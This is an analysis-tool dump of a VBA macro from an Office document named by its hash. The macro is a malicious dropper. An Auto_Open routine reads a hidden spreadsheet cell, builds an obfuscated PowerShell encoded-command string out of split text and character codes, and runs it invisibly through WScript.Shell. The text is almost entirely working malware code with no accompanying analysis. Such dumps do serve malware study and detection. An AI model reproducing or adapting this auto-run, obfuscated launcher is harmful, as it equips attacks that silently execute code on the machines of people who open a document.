Filename     : ./macros/9e81d7a2dbe2783d1995d018a5c4bd537ff110f54adb9670ce8a8dee8a09e612
OLE stream   : _VBA_PROJECT_CUR/VBA/Module1
VBA filename : Module1.bas
----------------------------------------
Attribute VB_Name = "Module1"
Sub Auto_Open()

    Call ZY0IBjFO

End Sub


Function GetVal(sr As Long, er As Long, c As Long)
    Dim x
    For i = sr To er
        x = x + Cells(i, c)
    Next
    GetVal = x
End Function


Function GetRand()
    Dim r As String
    Dim i As Integer
     
    Randomize
    For i = 1 To 8
        If i Mod 2 = 0 Then
            r = Chr(Int((90 - 65 + 1) * Rnd + 65)) & r
        Else
            r = Int((9 * Rnd) + 1) & r
        End If
    Next i
    GetRand = r
End Function


Sub ZY0IBjFO()
    Dim x, c As String
    x = GetVal(3256, 3256, 190)
    c = "po" & "W*er" & "sH*el" & "L -W 1 -C po" & "w*eRs" & "he*Ll ([char]45+[char]10*1+[char]110+[char]99) " & x
    Set s = CreateObject("WsCrip" & "t." & "Sh" & "ell")
    s.Run Replace(c, "*", ""), 0
End Sub


